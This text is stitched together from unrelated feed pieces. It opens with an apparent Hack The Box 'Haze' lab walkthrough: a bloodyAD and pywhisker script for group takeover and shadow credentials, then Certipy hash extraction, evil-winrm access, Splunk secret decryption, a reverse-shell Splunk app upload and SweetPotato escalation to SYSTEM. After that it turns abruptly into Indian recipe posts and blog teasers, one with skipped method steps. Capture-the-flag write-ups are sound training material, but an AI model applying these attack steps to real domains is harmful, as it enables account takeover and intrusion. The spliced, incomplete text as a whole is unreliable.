# Grant GenericAll permission to SUPPORT_SERVICES group
bloodyAD --host "$IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" -f rc4 add genericAll "SUPPORT_SERVICES" "$USER"
# Add user as member of SUPPORT_SERVICES group
bloodyAD --host "$IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" -f rc4 add groupMember 'SUPPORT_SERVICES' "$USER"
# Prompt user to enter the hash at runtime if empty
if [ -z "$HASH" ]; then
read -p "Enter the NTLM hash: " HASH
fi
# List KeyCredentialLink attribute for target user
pywhisker -d "$DOMAIN" -u "$USER" -H "$HASH" --target "$TARGET_USER" --action "list"
# Add KeyCredential to target user
pywhisker -d "$DOMAIN" -u "$USER" -H "$HASH" --target "$TARGET_USER" --action "add"
# Confirm KeyCredentialLink attribute update
pywhisker -d "$DOMAIN" -u "$USER" -H "$HASH" --target "$TARGET_USER" --action "list"I utilised an existing script to automate the execution of all the necessary commands, streamlining the process and ensuring accuracy during exploitation.
I used impacket-getTGT to request a Kerberos Ticket Granting Ticket (TGT) for the Haze-IT-Backup$ account on the haze.htb domain, authenticating with the NTLM hash instead of a plaintext password. After successfully obtaining the ticket, I set the KRB5CCNAME environment variable to point to the ticket cache file, allowing subsequent Kerberos-authenticated actions to use this ticket.
The image reveals that Haze-IT-Backup$ can modify the Owner attribute of the SUPPORT_SERVICES object. Notably, SUPPORT_SERVICES holds the privilege to issue certificates on behalf of the EDWARD account. This chain of permissions enables a classic Shadow Credentials attack. To exploit this path, the first step is to leverage the DACL misconfiguration on SUPPORT_SERVICES to gain control over the object and escalate privileges accordingly.
I used Certipy to perform an automated Shadow Credentials attack targeting the user edward.martin. By authenticating Haze-IT-Backup$ with the NTLM hash, Certipy generated and added a temporary Key Credential (certificate) to edward.martin’s account. This allowed the tool to authenticate edward.martin using the certificate and obtain a Ticket Granting Ticket (TGT). After successfully retrieving the TGT and saving it to a credential cache file, Certipy reverted the Key Credential changes to avoid detection. Finally, the tool extracted the NT hash for edward.martin, which can be used for further attacks or lateral movement.
I used evil-winrm to connect to the target machine as edward.martin, authenticating with the NT hash I had previously extracted. This granted me an interactive WinRM session with the privileges of edward.martin, allowing direct access to the system for further enumeration or exploitation.
We can read the user flag by simply running the command type user.txt inside the WinRM session.
While exploring the system, I navigated to C:\Backups\Splunk and found a backup file named splunk_backup_2024-08-06.zip. I downloaded the file for offline analysis using the download command in Evil-WinRM.
After downloading splunk_backup_2024-08-06.zip, I extracted its contents locally to analyse the files inside.
It appeared to be a standard Splunk directory structure.
It turned out that Splunk had created a copy of the active configuration file, which contained the hash above
An error occurred while attempting to use splunksecrets.
By running splunksecrets splunk-decrypt -S etc/auth/splunk.secret, I was able to decrypt the ciphertext
There was no user account associated with this password, resulting in a STATUS_LOGON_FAILURE During login attempts.
I tested this password by logging into the previously discovered website.
The login attempt was successful, confirming the password’s validity.
This means accessing and reviewing the part of the system where applications or services are controlled and configured. It involves looking at how apps are set up, what permissions they have, and possibly making changes to their settings.
Before proceeding, I conducted research to understand how to leverage the admin access effectively.
I then proceeded to use a reverse shell tool from this repository to gain remote shell access on the Splunk system.
I downloaded the reverse shell tool repository directly onto the target machine to prepare for the next steps.
The content matches the example shown above.
I added the reverse shell command to the appropriate script file.
The attempt to create (zip) the archive file failed.
I started a listener on my machine to catch the incoming reverse shell connection.
An attempt to upload the tar file through the app’s interface resulted in an error stating that the application does not exist.
I modified the reverse shell command to address the issues encountered.
This time, the zip file was created successfully without any issues.
The file was successfully uploaded to the application.
I successfully received the reverse shell connection from the target.
The current user has the SeImpersonatePrivilege permission enabled, as shown above. This privilege is commonly exploited using tools like Juicy Potato to escalate to NT SYSTEM.
The user alexander.green@haze.htb is a member of multiple Active Directory groups, including splunk_admins@haze.htb, Domain Users@haze.htb, and users@haze.htb. The splunk_admins group likely grants administrative privileges over the Splunk environment, which could provide access to sensitive logs, configurations, or even execution capabilities within Splunk. Additionally, being part of the Domain Users group confirms that the account is a standard domain-joined user. The users group, which includes Domain Users as members, may be used to manage or apply policies to a broader set of accounts. This nested group membership structure could potentially be leveraged to escalate privileges or pivot further within the domain, depending on the permissions assigned to each group.
I downloaded the SweetPotato binary to the target machine to leverage the SeImpersonatePrivilege for privilege escalation.
I tested SweetPotato by running it with the whoami command, confirming that privilege escalation to NT SYSTEM was successful.
Using this privilege escalation method, I gained NT SYSTEM access and was able to read the root flag.
The post Hack The Box: Haze Machine Walkthrough – Hard Difficulty appeared first on Threatninja.net.
No party is complete without food and drink. Lots of people choose to meet up by the beach for a day of fun in the sun but what sorts of food should people be eating? Read More ...
The post Beach Party Food Ideas: Snacks By The Sea first appeared on Give Me Some Spice!.
If you’re a recent convert to vegetarianism – or even if you’ve been doing it for life – one area holds a particular challenge: finding vegetarian food on the go. That’s true whether you’re eating Read More ...
The post Eating Vegetarian On The Go: Options And Tricks For You first appeared on Give Me Some Spice!.
Who doesn’t love a get together with friends to enjoy a game night? To get everyone excited about the games, we have to ensure that the food we serve is just as exciting and Read More ...
The post Vegetarian and Vegan Gaming Snacks For Your Brain: Focused and Full first appeared on Give Me Some Spice!.
Come winter, the market is flooded with fresh vegetables which are very tempting. Most of the times,I will hoard my fridge with the fresh produce and then struggle to consume it before the freshness withers away .
Winters at home means fresh green peas ,carrots,cauliflower and radish in abundance. Of course the evergreen , doodhi aka lauki makes it presence in the menu atleast once a week .
Aloo mutter is easy and simple to make,but packed with a riot of flavors. You can make with fresh peas or the frozen ones .Try and avoid the dried peas which needs to be soaked overnight . The dried peas don't blend well in to the curry is my opinion.
In winters, I make this curry with fresh peas and during off season ,the frozen peas comes handy . We can easily make this Aloo Matar gravy for year end parties , get togethers and office pot luck.
I learnt this recipe from my amma and she used just simple basic spices to make this curry and it would be served with piping hot fulkas just off the pan . I enjoy it with some thick yogurt or cucumber raita while hubby loves it with onion raita.
Kulchas and Naan are a best combination too and if serving with rice, simple steamed basmati rice, jeera rice ,peas pulav or vegetable pulao are just the perfect pairing.
I use the pressure cooker to make and it gets done quickly . Pressure cooker or instapot option is the best choice, if we want to make a large quantity of Aloo Matar.
Donot forget to use lots and lots of fresh corriander as garnish. It enhances the flavor of the gravy. Serve with some chopped onions and a wedge of lime.
Lauki Channa Dal (video)
Sabz Hariyali (video)
Aloo Gobhi is a classic winter delicacy . Piping hot phulkas/ rotis and a bowl of delicious Aloo Gobhi curry is an absolute bliss on a chill winter night .
Very simple to make with just basic spices ,Alu Gobhi sabji can be prepared in less than 15mins. I saute the basic spices with tomato ,potato and cauliflower and cook it in a pressure cooker for 1 whistle. This way it gets done quickly and perfectly .
The final garnish with fresh corriander is the icing on the cake,the smell of fine chopped kothmir when mixed with the curry kindles the appetite instantly. Those of who you like a little extra zing, you may squeeze some lime juice over the gravy.
Aloo Gobhi is a very popular side dish ordered in most restaurants and dhabas for all those who love typical North Indian flavors. We can make a dry curry like a stir fry using Aloo and Gobhi or even as a semi liquid gravy .
We love the gravy type curry at home ,so I prefer to make this for my family . A perfect choice for Vegans as well as those who don't prefer to include Onions and Garlic in their meal .
I chose this recipe for our ongoing No Garlic No Onion recipes theme in Shhh cooking secretly group. Theme suggested by Priya Iyer ,a versatile blogger .I was partnered with Sujata Ji for this theme who has dished out a creamy and delectable Paneer Malai Curry.
Ingredients
This Telangana Style Potato Roast is a gluten-free, vegan, spicy side dish. It gets ready in under 15 minutes and makes a perfect winter dish to cook on busy weekdays. The reason why I say it’s perfect for winters is the generous usage of garlic, as garlic is considered warming food. Warming foods produce more heat in your body and keep your body warm enough to endure the chilly winter. Hence we include warming foods like sesame seeds, garlic, ginger, chilies, etc in our diet.
Telangana regional cuisine is all about spice and garlic, and this dish just depicts the true flavors of this beautiful cuisine. Alugadda is a potato in the Telangana Telugu dialect and ellipaya karam refers to garlic spice. We eat lots of garlic and we make this special garlic spice Ellipaya karam every winter to have it in our daily meals. Some people call this dish Alugadda fry, vellulli alugadda vepudu or Alugadda vepudu. You can also call it Garlicky Potato Roast, Potato Stir-Fry, Aloo Fry, or crispy Indian potatoes.
In this recipe, potatoes are tossed in basic Indian spices and quick-roasted in the pan on high flame till they turn golden and crispy! Oh Yum! writing this I’m salivating already. There was a time in my life, I used to carry only potato fry and rice in my lunchbox every single day during my schooling days. That’s how much I love this dish and I promise once you try this, you’re going to love it. Also, contrary to many beliefs, potatoes are a source of good carbs when consumed in moderation! So do include this Alugadda ellipaya karam in your weekly menu!
Checkout more vegetarian sides and curries from my blog
Stuffed peppers in creamy tomato gravy
If you’ve tried this recipe, please share your valuable feedback in the comments below. Also, you can Tag your photo and share it with #mycurryveda on Instagram @mycurryveda or on Facebook. Also follow @taste.of.telangana on Instagram for more traditional recipes, culture, and stories.
The post ALUGADDA ELLIPAYA KARAM appeared first on mycurryveda.
Poori Aamras and Aloo Bhaji is almost everyone's favorite in Maharashtra and Gujarat. There will hardly be anyone who wouldn't like this combo. During the mango season, this made in heaven match features in my home quite a few times but surprisingly it never made to the blog .
The recipe for Aamras and Puri is already there on the blog while that off this simple yet tasty Aloo Bhaaji or Sabji will be shared today with you all . Every household has an heirloom recipe for making the aloo sabji depending on the family's liking . I am going to share a very very easy recipe which has been our favorite always. Preethi my blogger friend has a delicious recipe of Adraki Aloo which will also pair well these puris . The aamras has a little milk added while the aloo sabji is purely vegan . If you want to make the entire combo vegan friendly,you can skip the milk while preparing the aam ras .
This combo is so popular and a hearthrob that people swarm like bees at restaurants to enjoy. Some popular restaurants in Bombay have carved a niche for serving this delectable mini thali during the Mango Season and have been featured in various food magazines and shows for their superior quality and popularity.
Ingredients
Method 
POTATO RICE / URULAIKIZHANGU SADAM
Rice is the staple food thorough out our country. Especially so in the South since it is widely cultivated in this region. Eating cooked plain rice along with dal and vegetables has been a daily routine since ancient times. Traditionally prepared Variety Rice also known Chitra Anna or Kalanda Sadam is usually limited to only traditional festive menus. Not anymore ! Variety Rice has found its own special niche as a one pot meal in our daily meal plan .
People who have hectic work schedules prefer one pot meals / lunch box meals for the ease of cooking , cleaning and time saving . Variety Rice comes in handy during these situations. Other than Pulavs , Biriyanis and the traditional Chitra Annas , more and more innovative rice recipes with South Indian flavour are coming up on culinary platforms .
Here is a very simple Variety Rice prepared with Potatoes with a pleasant aroma of the nutritious Fenugreek leaves .
Cooked rice - 2 cups
Potatoes ( Pealed and cubed ) - 2 cups
Fenugreek leaves ( Washed and chopped ) - 2cups
Sesame oil - 2 tbsps
Mustard seeds - 1/4 tsp
Cumin seeds - 1/4 tsp
Asafoetida - 1 pinch
Curry leaves - a few
Turmeric powder - 1 pinch
Salt - 3/4 tsp
Sambar powder - 1 tsp
Chopped tomatoes - 1/2 cup
METHOD
1. Heat oil in a kadai and splutter mustard seeds and cumin seeds.
2. Add asafoetida , turmeric powder and curry leaves.
3. Stir in the fenugreek leaves and cook till it wilts.
4. Add the potato cubes , stir , cover and cook on medium flame till almost done.
7. Keep stirring till the tomatoes are just cooked.
My husband loved all kinds of Indian street foods and the chaats were his favourite. He loved the hot and spicy flavours and could make a chaat using basic ingredients in the kitchen. What is Read More ...
The post Samosa Chaat with yogurt ( Dahi samosa chaat) appeared first on Give Me Some Spice!.
